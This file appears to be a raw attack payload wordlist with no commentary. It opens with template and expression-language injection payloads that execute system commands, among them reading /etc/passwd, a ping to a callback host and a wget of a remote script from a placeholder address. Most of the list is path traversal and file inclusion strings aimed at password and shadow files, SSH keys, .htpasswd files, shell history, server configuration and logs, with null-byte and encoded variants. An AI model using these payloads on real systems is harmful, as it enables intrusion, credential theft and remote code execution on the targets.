{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} | |
{{['id']|filter('system')}} | |
{{['cat\x20/etc/passwd']|filter('system')}} | |
{{['cat$IFS/etc/passwd']|filter('system')}} | |
c:\AppServ\MySQL | |
C:/boot.ini | |
C:\boot.ini | |
/C:/inetpub/ftproot/ | |
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>) | |
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start() | |
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])} | |
#{session.getAttribute("rtc").setAccessible(true)} | |
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")} | |
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} | |
${request.getAttribute("c").add("cmd.exe")} | |
${request.getAttribute("c").add("/k")} | |
${request.getAttribute("c").add("ping $collabplz")} | |
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} | |
${request.getAttribute("a")} | |
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")} | |
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping $collabplz\\\")"))} | |
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} | |
C:/inetpub/wwwroot/global.asa | |
C:\inetpub\wwwroot\global.asa | |
c:\inetpub\wwwroot\index.asp | |
/config.asp | |
../config.asp | |
config.asp | |
../config.inc.php | |
config.inc.php | |
../config.js | |
config.js | |
_config.php | |
../_config.php | |
../config.php | |
config.php | |
../_config.php%00 | |
../../../../../../../../conf/server.xml | |
/core/config.php | |
/C:\Program Files\ | |
c:\Program Files\Apache Group\Apache\logs\access.log | |
c:\Program Files\Apache Group\Apache\logs\error.log | |
/.cshrc | |
c:\System32\Inetsrv\metabase.xml | |
c:WINDOWS/system32/ | |
d:\AppServ\MySQL | |
database.asp | |
database.js | |
database.php | |
data.php | |
dbase.php a | |
db.php | |
../../../../../../../dev | |
/D:\Program Files\ | |
d:\System32\Inetsrv\metabase.xml | |
/etc/apache2/apache2.conf | |
/etc/apache2/conf/httpd.conf | |
/etc/apache2/httpd.conf | |
/etc/apache2/sites-available/default | |
/etc/apache2/vhosts.d/default_vhost.include | |
/etc/apache/apache.conf | |
/etc/apache/conf/httpd.conf | |
/etc/apache/httpd.conf | |
/etc/apt/sources.list | |
/etc/chrootUsers | |
/etc/crontab | |
/etc/defaultdomain | |
/etc/default/passwd | |
/etc/defaultrouter | |
/etc/fstab | |
/etc/ftpchroot | |
/etc/ftphosts | |
/etc/group | |
/etc/hostname.bge | |
/etc/hostname.ce0 | |
/etc/hostname.ce1 | |
/etc/hostname.ce2 | |
/etc/hostname.ce3 | |
/etc/hostname.dcelx0 | |
/etc/hostname.dcelx1 | |
/etc/hostname.dcelx2 | |
/etc/hostname.dcelx3 | |
/etc/hostname.dmfe0 | |
/etc/hostname.dmfe1 | |
/etc/hostname.dmfe2 | |
/etc/hostname.dmfe3 | |
/etc/hostname.dnet0 | |
/etc/hostname.dnet1 | |
/etc/hostname.dnet2 | |
/etc/hostname.dnet3 | |
/etc/hostname.ecn0 | |
/etc/hostname.ecn1 | |
/etc/hostname.ecn2 | |
/etc/hostname.ecn3 | |
/etc/hostname.elx0 | |
/etc/hostname.elx1 | |
/etc/hostname.elx2 | |
/etc/hostname.elx3 | |
/etc/hostname.elxl0 | |
/etc/hostname.elxl1 | |
/etc/hostname.elxl2 | |
/etc/hostname.elxl3 | |
/etc/hostname.eri0 | |
/etc/hostname.eri1 | |
/etc/hostname.eri2 | |
/etc/hostname.eri3 | |
/etc/hostname.ge0 | |
/etc/hostname.ge1 | |
/etc/hostname.ge2 | |
/etc/hostname.ge3 | |
/etc/hostname.hme0 | |
/etc/hostname.hme1 | |
/etc/hostname.hme2 | |
/etc/hostname.hme3 | |
/etc/hostname.ieef0 | |
/etc/hostname.ieef1 | |
/etc/hostname.ieef2 | |
/etc/hostname.ieef3 | |
/etc/hostname.iprb0 | |
/etc/hostname.iprb1 | |
/etc/hostname.iprb2 | |
/etc/hostname.iprb3 | |
/etc/hostname.le0 | |
/etc/hostname.le1 | |
/etc/hostname.le2 | |
/etc/hostname.le3 | |
/etc/hostname.lo | |
/etc/hostname.pcn0 | |
/etc/hostname.pcn1 | |
/etc/hostname.pcn2 | |
/etc/hostname.pcn3 | |
/etc/hostname.qfe0 | |
/etc/hostname.qfe1 | |
/etc/hostname.qfe2 | |
/etc/hostname.qfe3 | |
/etc/hostname.spwr0 | |
/etc/hostname.spwr1 | |
/etc/hostname.spwr2 | |
/etc/hostname.spwr3 | |
/etc/hosts | |
../../../../../../../../../../../../etc/hosts | |
../../../../../../../../../../../../etc/hosts%00 | |
/etc/hosts.allow | |
/etc/hosts.deny | |
/etc/hosts.equiv | |
/etc/http/conf/httpd.conf | |
/etc/httpd.conf | |
/etc/httpd/conf.d/php.conf | |
/etc/httpd/conf.d/squirrelmail.conf | |
/etc/httpd/conf.d/ssl.conf | |
/etc/httpd/conf/httpd.conf | |
/etc/httpd/httpd.conf | |
/etc/httpd/logs/acces_log | |
/etc/httpd/logs/acces.log | |
../../../../../../../etc/httpd/logs/acces_log | |
../../../../../../../etc/httpd/logs/acces.log | |
/etc/httpd/logs/access_log | |
/etc/httpd/logs/access.log | |
../../../../../etc/httpd/logs/access_log | |
../../../../../etc/httpd/logs/access.log | |
/etc/httpd/logs/error_log | |
/etc/httpd/logs/error.log | |
../../../../../../../etc/httpd/logs/error_log | |
../../../../../../../etc/httpd/logs/error.log | |
../../../../../etc/httpd/logs/error_log | |
../../../../../etc/httpd/logs/error.log | |
/etc/httpd/php.ini | |
/etc/http/httpd.conf | |
/etc/inetd.conf | |
/etc/init.d/apache | |
/etc/init.d/apache2 | |
/etc/issue | |
/etc/logrotate.d/ftp | |
/etc/logrotate.d/httpd | |
/etc/logrotate.d/proftpd | |
/etc/logrotate.d/vsftpd.log | |
/etc/mail/access | |
/etc/mailman/mm_cfg.py | |
/etc/make.conf | |
/etc/master.passwd | |
/etc/motd | |
/etc/my.cnf | |
/etc/mysql/my.cnf | |
/etc/netconfig | |
/etc/nsswitch.conf | |
/etc/opt/ipf/ipf.conf | |
/etc/opt/ipf/ipnat.conf | |
/./././././././././././etc/passwd | |
/../../../../../../../../../../etc/passwd | |
/../../../../../../../../../../etc/passwd^^ | |
/..\../..\../..\../..\../..\../..\../etc/passwd | |
/etc/passwd | |
../../../../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../etc/passwd | |
../../../../../../../../../etc/passwd | |
../../../../../../../../etc/passwd | |
../../../../../../../etc/passwd | |
../../../../../../etc/passwd | |
../../../../../etc/passwd | |
../../../../etc/passwd | |
../../../etc/passwd | |
../../etc/passwd | |
../etc/passwd | |
..\..\..\..\..\..\..\..\..\..\etc\passwd | |
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd | |
\..\..\..\..\..\..\..\..\..\..\etc\passwd | |
etc/passwd | |
/etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../etc/passwd%00 | |
../../../../../../../../etc/passwd%00 | |
../../../../../../../etc/passwd%00 | |
../../../../../../etc/passwd%00 | |
../../../../../etc/passwd%00 | |
../../../../etc/passwd%00 | |
../../../etc/passwd%00 | |
../../etc/passwd%00 | |
../etc/passwd%00 | |
..\..\..\..\..\..\..\..\..\..\etc\passwd%00 | |
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 | |
/../../../../../../../../../../../etc/passwd%00.html | |
/../../../../../../../../../../../etc/passwd%00.jpg | |
../../../../../../etc/passwd&=%3C%3C%3C%3C | |
/etc/php4.4/fcgi/php.ini | |
/etc/php4/apache2/php.ini | |
/etc/php4/apache/php.ini | |
/etc/php4/cgi/php.ini | |
/etc/php5/apache2/php.ini | |
/etc/php5/apache/php.ini | |
/etc/php5/cgi/php.ini | |
/etc/php/apache2/php.ini | |
/etc/php/apache/php.ini | |
/etc/php/cgi/php.ini | |
/etc/php.d/dom.ini | |
/etc/php.d/gd.ini | |
/etc/php.d/imap.ini | |
/etc/php.d/json.ini | |
/etc/php.d/ldap.ini | |
/etc/php.d/mbstring.ini | |
/etc/php.d/mysqli.ini | |
/etc/php.d/mysql.ini | |
/etc/php.d/odbc.ini | |
/etc/php.d/pdo.ini | |
/etc/php.d/pdo_mysql.ini | |
/etc/php.d/pdo_odbc.ini | |
/etc/php.d/pdo_pgsql.ini | |
/etc/php.d/pdo_sqlite.ini | |
/etc/php.d/pgsql.ini | |
/etc/php.d/xmlreader.ini | |
/etc/php.d/xmlwriter.ini | |
/etc/php.d/xsl.ini | |
/etc/php.d/zip.ini | |
/etc/php.ini | |
/etc/php/php4/php.ini | |
/etc/php/php.ini | |
/etc/postfix/mydomains | |
/etc/proftp.conf | |
/etc/proftpd/modules.conf | |
/etc/protpd/proftpd.conf | |
/etc/pure-ftpd.conf | |
/etc/pureftpd.passwd | |
/etc/pureftpd.pdb | |
/etc/pure-ftpd/pure-ftpd.conf | |
/etc/pure-ftpd/pure-ftpd.pdb | |
/etc/pure-ftpd/pureftpd.pdb | |
/etc/release | |
/etc/resolv.conf | |
/etc/rpc | |
/etc/security/environ | |
/etc/security/failedlogin | |
/etc/security/group | |
/etc/security/lastlog | |
/etc/security/limits | |
/etc/security/passwd | |
/etc/security/user | |
/./././././././././././etc/shadow | |
/../../../../../../../../../../etc/shadow | |
/../../../../../../../../../../etc/shadow^^ | |
/..\../..\../..\../..\../..\../..\../etc/shadow | |
/etc/shadow | |
../../../../../../../../../../../../etc/shadow | |
..\..\..\..\..\..\..\..\..\..\etc\shadow | |
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow | |
\..\..\..\..\..\..\..\..\..\..\etc\shadow | |
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 | |
../../../../../../../../../../../../etc/shadow%00 | |
..\..\..\..\..\..\..\..\..\..\etc\shadow%00 | |
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 | |
etc/shadow%00 | |
/etc/ssh/sshd_config | |
/etc/sudoers | |
/etc/syslog.conf | |
/etc/syslogd.conf | |
/etc/system | |
/etc/updatedb.conf | |
/etc/utmp | |
/etc/vfstab | |
/etc/vhcs2/proftpd/proftpd.conf | |
/etc/vsftpd.chroot_list | |
/etc/vsftpd.conf | |
/etc/vsftpd/vsftpd.conf | |
/etc/wtmp | |
/etc/wu-ftpd/ftpaccess | |
/etc/wu-ftpd/ftphosts | |
/etc/wu-ftpd/ftpusers | |
/.forward | |
/home2\bin\stable\apache\php.ini | |
/home/apache/conf/httpd.conf | |
/home/apache/httpd.conf | |
/home\bin\stable\apache\php.ini | |
/.htpasswd | |
.htpasswd | |
../.htpasswd | |
../install.php | |
install.php | |
../../../../../../../../../../../../localstart.asp | |
../../../../../../../../../../../../localstart.asp%00 | |
/log/miscDir/accesslog | |
/.logout | |
/logs/access_log | |
/logs/access.log | |
../../../../../logs/access.log | |
../../../../logs/access.log | |
../../../logs/access.log | |
../../logs/access.log | |
../logs/access.log | |
/logs/error_log | |
/logs/error.log | |
../../../../../logs/error.log | |
../../../../logs/error.log | |
../../../logs/error.log | |
../../logs/error.log | |
../logs/error.log | |
/logs/pure-ftpd.log | |
/master.passwd | |
member/.htpasswd | |
members/.htpasswd | |
/.netrc | |
/NetServer\bin\stable\apache\php.ini | |
/opt/apache2/conf/httpd.conf | |
/opt/apache/conf/httpd.conf | |
/opt/lampp/logs/access_log | |
/opt/lampp/logs/access.log | |
/opt/lampp/logs/error_log | |
/opt/lampp/logs/error.log | |
/opt/xampp/etc/php.ini | |
/opt/xampp/logs/access_log | |
/opt/xampp/logs/access.log | |
/opt/xampp/logs/error_log | |
/opt/xampp/logs/error.log | |
.pass | |
../.pass | |
pass.dat | |
passwd | |
/.passwd | |
.passwd | |
../.passwd | |
passwd.dat | |
/php4\php.ini | |
/php5\php.ini | |
/php\php.ini | |
/PHP\php.ini | |
/private/etc/httpd/httpd.conf | |
/private/etc/httpd/httpd.conf.default | |
/proc/cpuinfo | |
/proc/interrupts | |
/proc/loadavg | |
/proc/meminfo | |
/proc/mounts | |
/proc/net/arp | |
/proc/net/dev | |
/proc/net/route | |
/proc/net/tcp | |
/proc/partitions | |
/proc/self/cmdline | |
/proc/self/envron | |
/proc/version | |
/.profile | |
/Program Files\Apache Group\Apache2\conf\httpd.conf | |
/Program Files\Apache Group\Apache\conf\httpd.conf | |
/Program Files\Apache Group\Apache\logs\access.log | |
/Program Files\Apache Group\Apache\logs\error.log | |
/Program Files\xampp\apache\conf\httpd.conf | |
/../../../../pswd | |
/.rhosts | |
/root/.bash_history | |
/root/.bash_logut | |
root/.htpasswd | |
/root/.ksh_history | |
/root/.Xauthority | |
/.sh_history | |
/.shosts | |
/.ssh/authorized_keys | |
user/.htpasswd | |
../users.db.php | |
users.db.php | |
users/.htpasswd | |
/usr/apache2/conf/httpd.conf | |
/usr/apache/conf/httpd.conf | |
/usr/etc/pure-ftpd.conf | |
/usr/lib/cron/log | |
/usr/lib/php.ini | |
/usr/lib/php/php.ini | |
/usr/lib/security/mkuser.default | |
/usr/local/apache2/conf/httpd.conf | |
/usr/local/apache2/httpd.conf | |
/usr/local/apache2/logs/access_log | |
/usr/local/apache2/logs/access.log | |
/usr/local/apache2/logs/error_log | |
/usr/local/apache2/logs/error.log | |
/usr/local/apache/conf/httpd.conf | |
/usr/local/apache/conf/php.ini | |
/usr/local/apache/httpd.conf | |
/usr/local/apache/log | |
/usr/local/apache/logs | |
/usr/local/apache/logs/access_log | |
/usr/local/apache/logs/access_ log | |
/usr/local/apache/logs/access.log | |
/usr/local/apache/logs/access. log | |
../../../../../../../usr/local/apache/logs/access_ log | |
../../../../../../../usr/local/apache/logs/access. log | |
../../../../../usr/local/apache/logs/access_log | |
../../../../../usr/local/apache/logs/access.log | |
/usr/local/apache/logs/error_log | |
/usr/local/apache/logs/error.log | |
../../../../../../../usr/local/apache/logs/error_l og | |
../../../../../../../usr/local/apache/logs/error.l og | |
../../../../../usr/local/apache/logs/error_log | |
../../../../../usr/local/apache/logs/error.log | |
/usr/local/apps/apache2/conf/httpd.conf | |
/usr/local/apps/apache/conf/httpd.conf | |
/usr/local/cpanel/logs | |
/usr/local/cpanel/logs/access_log | |
/usr/local/cpanel/logs/error_log | |
/usr/local/cpanel/logs/license_log | |
/usr/local/cpanel/logs/login_log | |
/usr/local/cpanel/logs/stats_log | |
/usr/local/etc/apache2/conf/httpd.conf | |
/usr/local/etc/apache/conf/httpd.conf | |
/usr/local/etc/apache/vhosts.conf | |
/usr/local/etc/httpd/conf/httpd.conf | |
/usr/local/etc/httpd/logs/access_log | |
/usr/local/etc/httpd/logs/error_log | |
/usr/local/etc/php.ini | |
/usr/local/etc/pure-ftpd.conf | |
/usr/local/etc/pureftpd.pdb | |
/usr/local/httpd/conf/httpd.conf | |
/usr/local/lib/php.ini | |
/usr/local/php4/httpd.conf | |
/usr/local/php4/httpd.conf.php | |
/usr/local/php4/lib/php.ini | |
/usr/local/php5/httpd.conf | |
/usr/local/php5/httpd.conf.php | |
/usr/local/php5/lib/php.ini | |
/usr/local/php/httpd.conf | |
/usr/local/php/httpd.conf.php | |
/usr/local/php/lib/php.ini | |
/usr/local/pureftpd/etc/pure-ftpd.conf | |
/usr/local/pureftpd/etc/pureftpd.pdb | |
/usr/local/pureftpd/sbin/pure-config.pl | |
/usr/local/www/logs/thttpd_log | |
/usr/local/Zend/etc/php.ini | |
/usr/pkgsrc/net/pureftpd/ | |
/usr/ports/contrib/pure-ftpd/ | |
/usr/ports/ftp/pure-ftpd/ | |
/usr/ports/net/pure-ftpd/ | |
/usr/sbin/pure-config.pl | |
/usr/spool/lp/log | |
/usr/spool/mqueue/syslog | |
/var/adm | |
/var/adm/acct/sum/loginlog | |
/var/adm/aculog | |
/var/adm/aculogs | |
/var/adm/crash/unix | |
/var/adm/crash/vmcore | |
/var/adm/cron/log | |
/var/adm/dtmp | |
/var/adm/lastlog | |
/var/adm/lastlog/username | |
/var/adm/log/asppp.log | |
/var/adm/loginlog | |
/var/adm/log/xferlog | |
/var/adm/lp/lpd-errs | |
/var/adm/messages | |
/var/adm/pacct | |
/var/adm/qacct | |
/var/adm/ras/bootlog | |
/var/adm/ras/errlog | |
/var/adm/sulog | |
/var/adm/SYSLOG | |
/var/adm/utmp | |
/var/adm/utmpx | |
/var/adm/vold.log | |
/var/adm/wtmp | |
/var/adm/wtmpx | |
/var/adm/X0msgs | |
/var/apache/log | |
/var/apache/logs | |
/var/apache/logs/access_log | |
/var/apache/logs/error_log | |
/var/cpanel/cpanel.config | |
/var/cron/log | |
/var/lib/mlocate/mlocate.db | |
/var/lib/mysql/my.cnf | |
/var/local/www/conf/php.ini | |
/var/lock/samba | |
/var/log | |
/var/log/access_log | |
/var/log/access.log | |
../../../../../../../var/log/access_log | |
../../../../../../../var/log/access.log | |
../../../../../var/log/access_log | |
/var/log/acct | |
/var/log/apache2/access_log | |
/var/log/apache2/access.log | |
../../../../../../../var/log/apache2/access_log | |
../../../../../../../var/log/apache2/access.log | |
/var/log/apache2/error_log | |
/var/log/apache2/error.log | |
../../../../../../../var/log/apache2/error_log | |
../../../../../../../var/log/apache2/error.log | |
/var/log/apache/access_log | |
/var/log/apache/access.log | |
../../../../../../../var/log/apache/access_log | |
../../../../../../../var/log/apache/access.log | |
../../../../../var/log/apache/access_log | |
../../../../../var/log/apache/access.log | |
/var/log/apache/error_log | |
/var/log/apache/error.log | |
../../../../../../../var/log/apache/error_log | |
../../../../../../../var/log/apache/error.log | |
../../../../../var/log/apache/error_log | |
../../../../../var/log/apache/error.log | |
/var/log/apache-ssl/access.log | |
/var/log/apache-ssl/error.log | |
/var/log/auth | |
/var/log/authlog | |
/var/log/auth.log | |
/var/log/boot.log | |
/var/log/cron.log | |
/var/log/dmesg | |
/var/log/error_log | |
/var/log/error.log | |
../../../../../../../var/log/error_log | |
../../../../../../../var/log/error.log | |
../../../../../var/log/error_log | |
/var/log/exim_mainlog | |
/var/log/exim/mainlog | |
/var/log/exim_paniclog | |
/var/log/exim/paniclog | |
/var/log/exim_rejectlog | |
/var/log/exim/rejectlog | |
/var/log/ftplog | |
/var/log/ftp-proxy | |
/var/log/ftp-proxy/ftp-proxy.log | |
/var/log/httpd/ | |
/var/log/httpd/access_log | |
/var/log/httpd/access.log | |
../../../../../var/log/httpd/access_log | |
/var/log/httpd/error_log | |
/var/log/httpd/error.log | |
../../../../../var/log/httpd/error_log | |
/var/log/httpsd/ssl.access_log | |
/var/log/httpsd/ssl_log | |
/var/log/kern.log | |
/var/log/lastlog | |
/var/log/lighttpd | |
/var/log/maillog | |
/var/log/message | |
/var/log/messages | |
/var/log/mysqlderror.log | |
/var/log/mysqld.log | |
/var/log/mysql.log | |
/var/log/mysql/mysql-bin.log | |
/var/log/mysql/mysql.log | |
/var/log/mysql/mysql-slow.log | |
/var/log/ncftpd.errs | |
/var/log/ncftpd/misclog.txt | |
/var/log/news | |
/var/log/news.all | |
/var/log/news/news | |
/var/log/news/news.all | |
/var/log/news/news.crit | |
/var/log/news/news.err | |
/var/log/news/news.notice | |
/var/log/news/suck.err | |
/var/log/news/suck.notice | |
/var/log/nginx/access_log | |
/var/log/nginx/access.log | |
../../../../../../../var/log/nginx/access_log | |
../../../../../../../var/log/nginx/access.log | |
../../../../../var/log/nginx/access_log | |
../../../../../var/log/nginx/access.log | |
/var/log/nginx/error_log | |
/var/log/nginx/error.log | |
../../../../../../../var/log/nginx/error_log | |
../../../../../../../var/log/nginx/error.log | |
../../../../../var/log/nginx/error_log | |
../../../../../var/log/nginx/error.log | |
/var/log/poplog | |
/var/log/POPlog | |
/var/log/proftpd | |
/var/log/proftpd.access_log | |
/var/log/proftpd.xferlog | |
/var/log/proftpd/xferlog.legacy | |
/var/log/pureftpd.log | |
/var/log/pure-ftpd/pure-ftpd.log | |
/var/log/qmail | |
/var/log/qmail/ | |
/var/log/samba | |
/var/log/samba-log.%m | |
/var/log/secure | |
/var/log/smtpd | |
/var/log/spooler | |
/var/log/syslog | |
/var/log/telnetd | |
/var/log/thttpd_log | |
/var/log/utmp | |
/var/log/vsftpd.log | |
/var/log/wtmp | |
/var/log/xferlog | |
/var/log/yum.log | |
/var/lp/logs/lpNet | |
/var/lp/logs/lpsched | |
/var/lp/logs/requests | |
/var/mysql.log | |
/var/run/httpd.pid | |
/var/run/mysqld/mysqld.pid | |
/var/run/utmp | |
/var/saf/_log | |
/var/saf/port/log | |
/var/spool/errors | |
/var/spool/locks | |
/var/spool/logs | |
/var/spool/tmp | |
/var/www/conf/httpd.conf | |
/var/www/html/.htaccess | |
/var/www/localhost/htdocs/.htaccess | |
/var/www/log/access_log | |
/var/www/log/error_log | |
/../../var/www/logs/access_log | |
/var/www/logs/access_log | |
/var/www/logs/access.log | |
../../../../../../../var/www/logs/access_log | |
../../../../../../../var/www/logs/access.log | |
../../../../../var/www/logs/access.log | |
/var/www/logs/error_log | |
/var/www/logs/error.log | |
../../../../../../../var/www/logs/error_log | |
../../../../../../../var/www/logs/error.log | |
../../../../../var/www/logs/error_log | |
../../../../../var/www/logs/error.log | |
/var/www/sitename/htdocs/ | |
/var/www/vhosts/sitename/httpdocs/.htaccess | |
/var/www/web1/html/.htaccess | |
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf | |
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf | |
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf | |
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php | |
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php | |
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php | |
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini | |
/Volumes/webBackup/opt/apache2/conf/httpd.conf | |
/Volumes/webBackup/private/etc/httpd/httpd.conf | |
/Volumes/webBackup/private/etc/httpd/httpd.conf.default | |
/web/conf/php.ini | |
/WINDOWS\php.ini | |
../../windows/win.ini | |
/WINNT\php.ini | |
/..\..\..\..\..\..\winnt\win.ini | |
/www/logs/proftpd.system.log | |
/xampp\apache\bin\php.ini | |
/.Xauthority | |
..2fapache2flogs2ferror.log | |
..2fapache2flogs2faccess.log | |
..2f..2fapache2flogs2ferror.log | |
..2f..2fapache2flogs2faccess.log | |
..2f..2f..2fapache2flogs2ferror.log | |
..2f..2f..2fapache2flogs2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log | |
..2fetc2fpasswd | |
..2fetc2fpasswd%00 | |
..2f..2fetc2fpasswd | |
..2f..2fetc2fpasswd%00 | |
..2f..2f..2fetc2fpasswd | |
..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
